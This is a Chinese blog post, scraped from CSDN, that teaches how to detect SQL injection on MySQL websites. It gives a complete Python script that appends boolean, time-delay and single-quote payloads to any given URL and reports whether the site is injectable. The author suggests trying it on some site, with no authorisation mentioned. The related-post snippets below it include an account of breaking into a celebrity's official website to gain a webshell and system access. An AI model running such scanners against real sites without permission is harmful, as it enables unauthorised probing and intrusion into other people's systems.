mysql注入漏洞检查_Python-编写一个mysql注入漏洞检测工具

最新推荐文章于 2024-05-09 00:29:10 发布
最新推荐文章于 2024-05-09 00:29:10 发布
阅读量158 收藏 2
点赞数
文章标签: mysql注入漏洞检查
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_33610601/article/details/114881178
版权

判断mysql网站是否存在注入漏洞的几个方法:

注入点后加上一个单引号会报错

and 1=1返回正常页面,and 1=2返回的页面不同于正常页面

and sleep(3) 网页会等待3秒左右

根据返回的页面情况我们就能知道是否存在注入漏洞

要获取页面返回的结果是不是一样的,我们可以通过获取请求头中的Content-Length的长度来判断

知道这些后,我们就能来写个简单的python脚本

# -*- coding:utf-8 -*-

__author__ = "MuT6 Sch01aR"

import requests

import argparse

import time

def argparse_option():

parser = argparse.ArgumentParser(description='The Help of Mysql_Inject.py')

parser.add_argument('-u','--url',help='The Url To Check')

args = parser.parse_args()

return args

def way_1(url):

payload = [' and 1=1',' and 1=2']

url_1 = url+payload[0]

url_2 = url+payload[1]

r = requests.get(url=url)

r_1 = requests.get(url=url_1)

r_2 = requests.get(url=url_2)

h = r.headers.get('Content-Length')

h_1 = r_1.headers.get('Content-Length')

h_2 = r_2.headers.get('Content-Length')

if h ==h_1 and h !=h_2:

print("[*] %s can be injected" %url)

else:

way_2(url)

def way_2(url):

payload = ' and sleep(5)'

t1 = time.time()

requests.get(url=url+payload)

t2 = time.time()

if t2-t1 >5:

print("[*] %s can be injected" %url)

else:

way_3(url)

def way_3(url):

payload = "'"

url_1 = url+payload

r = requests.get(url=url)

r_1 = requests.get(url=url_1)

h = r.headers.get('Content-Length')

h_1 = r_1.headers.get('Content-Length')

if h != h_1:

print("[*] %s can be injected" % url)

else:

print("[!] %s can't be injected" %url)

if __name__ == '__main__':

cmd_args = argparse_option()

url = cmd_args.url

if url:

way_1(url)

else:

print("Usage:python3 main.py -u [url]")

找个站测试一下

1e1a35ae4683cd638176c2f00a3ca513.png

这个脚本还只能检测一些简单的链接,多参数的还检测不了

我解决我的问题
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
SQL手工注入漏洞测试(MySQL数据库)
qq_48973639的博客
03-29 368
墨者学院SQL手动注入 MYSQL数据库实战环境 步骤: 判断注入: 输入 and1=1 页面显示正常 输入 and1=2 页面显示异常 判断字段长度 从order by 1开始到order by 4 页面都显示正常;到了 order by 5 时页面显示异常 使用联合查询 ?id=-1 union select 1,2,3,4回显2,3异常 爆破数据库名和数据库版本信息 id=-1 union select 1,database(),version(),4
vscod npm mysql镜像失败_镜像漏洞扫描工具Trivy
weixin_31669073的博客
02-04 270
Trivy的特征Trivy是一种适用于CI的简单而全面的容器漏洞扫描程序。软件漏洞是指软件或操作系统中存在的故障、缺陷或弱点。Trivy检测操作系统包(Alpine、RHEL、CentOS等)和应用程序依赖(Bundler、Composer、npm、yarn等)的漏洞。Trivy很容易使用,只要安装二进制文件,就可以扫描了。扫描只需指定容器的镜像名称。与其他镜像扫描工具相比,例如Clair,Anc...
2024年软件测试最全渗透测试-SQL注入检测_sql注入 在线检测(1),看这篇足矣了
最新发布
2401_84765537的博客
05-09 817
而当我们使用 用户名‘:–的时候,!这时候对比两条sql就能发现,其实用户通过在用户名写入的sql符号将内部sql提前结束,并且。: SQL注入就是本来我只有我能操作数据库,本来只是让你输入内容就走,而你却输入命令,从而在我不知情下操作数据库。
MYSQL注入简单测试
hs_cs的博客
06-06 239
墨者启动靶场 进入页面,在地址栏输入正确和错误字符,观察页面是否有因参数你能够被传入数据库产生页面变化。
Python MySQL注入
weixin_44602192的博客
05-18 258
Sql 注入攻击是通过将恶意的 Sql 查询或添加语句插入到应用的输入参数中,再在后台 Sql 服务器上解析执行进行的攻击,它目前黑客对数据库进行攻击的最常用手段之一 利用SQL “#” 的注释功能更改原SQL语句来实现 存在SQL注入问题的代码: #! /usr/bin/python3 # -*- encoding:utf8 -*- import pymysql import hashlib dbserver = input('输入服务器地址:') username = input('请输入用户帐号:
python操作mysql_Python 操作MySQL防SQL注入
weixin_39519072的博客
11-24 131
Python 操作MySQL防SQL注入2017-09-19 18:23阅读: 你若盛开_蝴蝶自来鹅厂DBA关注在Python语法中,一般情况我们会这样写SQL: SQL= 'UPDATE user SET nickname = %s WHEREuid = %s;'%(nickname,uid)然后执行:cursor.execute(SQL)但是这样会带来安全问题,如果传入的参数u...
自己动手编写SQL注入漏洞扫描工具
12-31
标题中的“自己动手编写SQL注入漏洞扫描工具”指的是创建一个能够自动检测Web应用程序是否存在SQL注入漏洞的软件。SQL注入是一种常见的网络安全威胁,攻击者通过在输入字段中插入恶意的SQL语句来操纵数据库,获取...
Python-BBQSQLSQL注入开发工具
08-10
BBQSQL(Barbeque SQL)是一款基于Python编写的强大且灵活的SQL注入开发工具。它专为安全研究人员和渗透测试人员设计,用于检测和利用SQL注入漏洞。在信息安全领域,SQL注入是一种常见的攻击手段,攻击者通过在Web...
SQL住入原始脚本_SQL注入python脚本_
10-03
SQLmap是一个自动化工具,专门用于检测和利用SQL注入漏洞。它支持多种数据库类型,包括MySQL、PostgreSQL、Oracle等,并且可以执行各种类型的SQL注入攻击。在提供的压缩文件中,`less14_exp.py`, `less9_exp.py`, `...
sqlmap注入sql漏洞测试工具,可以通过该工具测试进行漏洞修补
12-23
SQLMap是一款著名的自动化SQL注入工具,主要用于检测和利用SQL注入漏洞。它可以帮助安全研究员或渗透测试人员有效地识别和利用数据库漏洞,确保网站和应用程序的安全性。在标题和描述中提到的,这个工具可以用于测试...
sqlmap-sql注入工具
07-06
综上所述,SQLMap是一个强大的安全工具,能够帮助安全专家识别并利用SQL注入漏洞。然而,它也提醒我们重视应用程序的安全编码,防止此类漏洞的发生。理解和正确使用SQLMap,既可以提高安全测试效率,也可以增强对...
基于python的sql注入脚本
03-04
适合刚学python和sql注入的人 import urllib2 import re
php+mysql注入页面实现
09-11
最近在弄靶场,原本是打算找一些漏洞程序来做实验环境,但是去找这些程序感觉太麻烦了,几段代码能实现的东西还是自己写吧
mysql 注入检测服务_检测周杰伦官方网站 mysql5注入
weixin_35976688的博客
01-20 112
文章作者:Flyh4t[脚本安全小组]信息来源:邪恶八进制信息安全团队(www.eviloctal.com)本文已经发表在《***手册》,转载请署名版权某日在群里聊天,有朋友丢出一个jay官方网站的注入点,闲着无聊就测试了下。没想到最后轻松的得到了系统权限。在取得webshell过程中遇到点困难,也学到了一点东西。看注射点,老规矩,先提交个单引号,返回如图1错误提示是You have an err...
Python网站的漏洞如何检查
qq_32506555的博客
08-19 782
本文和大家分享的主要是python网站的漏洞检查相关内容,一起来看看吧,希望通过本文的分享能帮助大家更好的检查python开发的标准网站中的高风险问题。 SQL注入   查找所有含有SQL查询的文件,你要找到使用和下面语法类似的查询语句:   stmt = "SELECT * FROM table WHERE id=?" connection.execute(stmt, (
python操作MySQL,SQL注入问题,视图,触发器,事务,存储过程,内置函数,流程控制,索引
m0_69962105的博客
10-26 194
视图就是通过查询得到一张虚拟表,然后保存下来,下次可以直接使用在满足对某张表数据的增,删,该的情况下,自动触发的功能称之为触发器开启一个事务可以包含一些SQL语句,这些SQL语句要么同时成功要么同时失败存储过程包含了一系列可执行的SQL语句,存储过程存放于MySQL中,通过调用他的名字可以执行它内部的一堆sql,类似python中的自定义函数索引是一种数据结构,也叫做"键",是存储引擎用于快速找到记录的一种数据结构索引有:primary key----------可以加快查询速度,还有约束作用。
mysql安全测试工具_安全测试工具之sqlmap
weixin_42510407的博客
02-03 246
介绍Sqlmap是一种开源的渗透测试工具,可以自动检测和利用SQL注入漏洞以及接入该数据库的服务器。它拥有非常强大的检测引擎、具有多种特性的渗透测试器、通过数据库指纹提取访问底层文件系统并通过外带连接执行命令。支持的数据库:MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Fire...
pythonmysql变量的问题以及注入攻击
fenfenmiao的博客
01-06 518
mysqldump -u root -p ipinyou>G:\20170106beifen\a20170106.sql 这个命令可以用来备份数据库,-p后面是库的名字,>后面是要导出来的文件的名字,这个sql就是最后要的,但是我不懂怎么恢复......好像是source这个sql就行了..... 还有在excute里使用变量,正常是%s占位(无论什么型的都是%s占位,不加引号什么的,然后ex
mysql 反斜杠转义_python-字符串带反斜杠写进数据库
05-26
一种常见的方式是使用 Python 中的原始字符串(raw string),即在字符串前面加上一个字母 r。例如,要将字符串 "C:\Program Files\" 写入数据库,可以使用原始字符串 r"C:\Program Files\"。 总之,无论是在 MySQL...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值